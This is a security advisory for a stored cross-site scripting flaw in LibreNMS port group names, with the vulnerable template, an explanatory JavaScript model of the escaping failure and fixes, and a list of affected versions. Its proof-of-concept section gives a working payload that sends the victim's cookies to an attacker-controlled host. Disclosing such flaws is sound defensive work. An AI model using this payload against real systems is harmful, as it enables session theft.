GHSA-93fx-g747-695x

Source
https://github.com/advisories/GHSA-93fx-g747-695x
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-93fx-g747-695x/GHSA-93fx-g747-695x.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-93fx-g747-695x
Aliases
  • CVE-2026-26992
Published
2026-02-18T22:07:42Z
Modified
2026-02-18T22:35:26.106441Z
Severity
  • 5.1 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N
Summary
LibreNMS /port-groups name Stored Cross-Site Scripting
Details

Summary

/port-groups name Stored Cross-Site Scripting

  • HTTP POST
  • Request-URI(s): "/port-groups"
  • Vulnerable parameter(s): "name"
  • Attacker must be authenticated with "admin" privileges.
  • When a user adds a port group, an HTTP POST request is sent to the Request-URI "/port-groups". The name of the newly created port group is stored in the value of the name parameter.
  • After the port group is created, the entry is displayed along with some relevant buttons like Edit and Delete.

Details

The vulnerability exists because the port group's name is not sanitized of HTML/JavaScript-related characters or strings. The following template renders the page, including the Delete button:

resources/views/port-group/index.blade.php:

@extends('layouts.librenmsv1')
@section('title', __('Port Groups'))
@section('content')
<div class="container-fluid">
<x-panel id="manage-port-groups-panel">
{{-- [...Truncated...] --}}
@foreach($port_groups as $port_group)
{{-- [...Truncated...] --}}

<button type="button" class="btn btn-danger btn-sm" title="{{ __('delete Port Group') }}" aria-label="{{ __('Delete') }}"
        onclick="delete_pg(this, '{{ $port_group->name }}', '{{ route('port-groups.destroy', $port_group->id) }}')">
{{-- the port group's name is placed inside the Delete button's onclick JavaScript without sanitizing for XSS-related characters/strings --}}

As the port group's name is not sanitized of HTML/JavaScript-related characters or strings before being placed in the onclick handler, this results in stored cross-site scripting.
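As an added illustration (not code from the advisory or from LibreNMS), the following JavaScript models why Blade's `{{ }}` escaping does not protect a value placed inside the onclick JavaScript string. `{{ }}` applies HTML entity encoding (PHP `htmlspecialchars` with `ENT_QUOTES`), but the browser decodes those entities in the attribute value before it compiles the handler, so a single apostrophe in a name is enough to terminate the JavaScript string literal. The sample name and URL are constructed, and a `delete_pg(this)` that reads `data-*` attributes is an assumed redesign, not the project's fix.

```javascript
// Added example (not from the advisory or LibreNMS). Models the rendering path
// of the Delete button: a port-group name is HTML-escaped by Blade's {{ }},
// placed inside a JavaScript string literal in an onclick attribute, and the
// browser decodes the attribute's entities again before compiling that JS.

// What Blade's {{ }} does (PHP htmlspecialchars with ENT_QUOTES).
function htmlEscape(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
}

// What the HTML parser does to an attribute value before onclick is compiled:
// the entities are decoded back, so HTML escaping gives the JS context nothing.
function decodeAttrEntities(s) {
  return s
    .replace(/&#039;/g, "'")
    .replace(/&quot;/g, '"')
    .replace(/&lt;/g, '<')
    .replace(/&gt;/g, '>')
    .replace(/&amp;/g, '&');
}

// The advisory's pattern: onclick="delete_pg(this, '{{ $name }}', '{{ $url }}')".
function renderOnclickHtmlEscapedOnly(name, url) {
  return `delete_pg(this, '${htmlEscape(name)}', '${htmlEscape(url)}')`;
}

// Layered encoding: encode for the inner context (a JS string literal) first,
// then for the outer context (an HTML attribute). The \uXXXX forms keep the
// literal free of characters that could end a tag or attribute on their own.
function jsLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026');
}
function renderOnclickLayered(name, url) {
  return htmlEscape(`delete_pg(this, ${jsLiteral(name)}, ${jsLiteral(url)})`);
}

// Preferred: keep the value out of JavaScript source entirely. Only HTML
// attribute escaping is needed, and the handler reads the data attributes.
// (delete_pg taking a single argument is an assumed redesign, not LibreNMS's.)
function renderButtonDataAttr(name, url) {
  return `<button type="button" class="btn btn-danger btn-sm"` +
    ` data-name="${htmlEscape(name)}" data-url="${htmlEscape(url)}"` +
    ` onclick="delete_pg(this)">`;
}
function deletePgFromDataset(button) {
  // In a browser `button.dataset` is a DOMStringMap; any object with a
  // `dataset` property works here so the logic runs without a DOM.
  return [button.dataset.name, button.dataset.url];
}

// Minimal parser for the exact call the template is meant to emit:
//   delete_pg(this, <string literal>, <string literal>)
// Returns [name, url] when the decoded source still has that shape, or null
// when the name has escaped its literal, which is the precondition for XSS.
function parseDeleteCall(src) {
  let i = 0;
  const expect = (lit) => {
    if (!src.startsWith(lit, i)) return false;
    i += lit.length;
    return true;
  };
  const readStringLiteral = () => {
    const q = src[i];
    if (q !== "'" && q !== '"') return null;
    i++;
    let out = '';
    while (i < src.length) {
      const c = src[i++];
      if (c === '\\') {
        const n = src[i++];
        if (n === 'u') { out += String.fromCharCode(parseInt(src.slice(i, i + 4), 16)); i += 4; }
        else if (n === 'n') out += '\n';
        else out += n; // \' \" \\ \/ and similar
      } else if (c === q) {
        return out;
      } else {
        out += c;
      }
    }
    return null; // unterminated literal
  };
  if (!expect('delete_pg(this, ')) return null;
  const name = readStringLiteral();
  if (name === null || !expect(', ')) return null;
  const url = readStringLiteral();
  if (url === null || !expect(')') || i !== src.length) return null;
  return [name, url];
}

// Constructed sample values: a legitimate name containing an apostrophe is
// enough to break the HTML-escaped-only rendering; no attack payload needed.
const SAMPLE_NAME = "O'Brien uplinks";
const SAMPLE_URL = 'https://librenms.example.test/port-groups/7';

function demo() {
  const broken = parseDeleteCall(decodeAttrEntities(renderOnclickHtmlEscapedOnly(SAMPLE_NAME, SAMPLE_URL)));
  const intact = parseDeleteCall(decodeAttrEntities(renderOnclickLayered(SAMPLE_NAME, SAMPLE_URL)));
  return { broken, intact }; // broken is null; intact is [SAMPLE_NAME, SAMPLE_URL]
}
console.log(JSON.stringify(demo()));
```

Layered encoding works but is easy to get in the wrong order; moving the value into `data-*` attributes, as the last rendering does, removes the JavaScript string context altogether, which is why it is the option a reviewer would normally ask for.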

PoC

  • Login
  • Select Ports > Manage Port Groups
  • Select New Port Group
  • Input 12345');varpt=newImage();pt.src='http://<ATTACKER_IP>/cookiePG'.concat(document.cookie);document.body.appendChild(pt);delete_pg(this, '12345 into the "Name" input box (change <ATTACKER_IP> to the IP of an attacker-controlled web server)
  • Select Save
  • Select the Delete Icon for the newly created Port Group
  • Select OK
  • The JavaScript payload is not sanitized, and an HTTP request is sent to the attacker-controlled server, leaking the user's cookies.
Database specific
{
    "github_reviewed_at": "2026-02-18T22:07:42Z",
    "severity": "MODERATE",
    "cwe_ids": [
        "CWE-79"
    ],
    "github_reviewed": true,
    "nvd_published_at": null
}
References

Affected packages

Packagist / librenms/librenms

Package

Name
librenms/librenms
Purl
pkg:composer/librenms/librenms

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version; all previous versions are affected)
Fixed
26.2.0

Affected versions

1.*
1.19
1.20
1.20.1
1.21
1.22
1.22.01
1.23
1.24
1.25
1.26
1.27
1.28
1.29
1.30
1.30.01
1.31
1.31.01
1.31.02
1.31.03
1.32
1.32.01
1.33
1.33.01
1.34
1.35
1.36
1.36.01
1.37
1.38
1.39
1.40
1.41
1.42
1.42.01
1.43
1.44
1.45
1.46
1.47
1.48
1.48.1
1.49
1.50
1.50.1
1.51
1.52
1.53
1.53.1
1.54
1.55
1.56
1.57
1.58
1.58.1
1.59
1.60
1.61
1.62
1.62.1
1.62.2
1.63
1.64
1.64.1
1.65
1.65.1
1.66
1.67
1.68
1.69
1.70.0
1.70.1
21.*
21.1.0
21.2.0
21.3.0
21.4.0
21.5.0
21.5.1
21.6.0
21.7.0
21.8.0
21.9.0
21.9.1
21.10.0
21.10.1
21.10.2
21.11.0
21.12.0
21.12.1
22.*
22.1.0
22.2.0
22.2.1
22.2.2
22.3.0
22.4.0
22.4.1
22.5.0
22.6.0
22.7.0
22.8.0
22.9.0
22.10.0
22.11.0
22.12.0
23.*
23.1.0
23.1.1
23.2.0
23.4.0
23.4.1
23.5.0
23.6.0
23.7.0
23.8.0
23.8.1
23.8.2
23.9.0
23.9.1
23.10.0
23.11.0
24.*
24.1.0
24.2.0
24.3.0
24.4.0
24.4.1
24.5.0
24.6.0
24.7.0
24.8.0
24.8.1
24.9.0
24.9.1
24.10.0
24.10.1
24.11.0
24.12.0
25.*
25.1.0
25.2.0
25.3.0
25.4.0
25.5.0
25.6.0
25.7.0
25.8.0
25.9.0
25.9.1
25.10.0
25.11.0
25.12.0
26.*
26.1.0
26.1.1

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/02/GHSA-93fx-g747-695x/GHSA-93fx-g747-695x.json"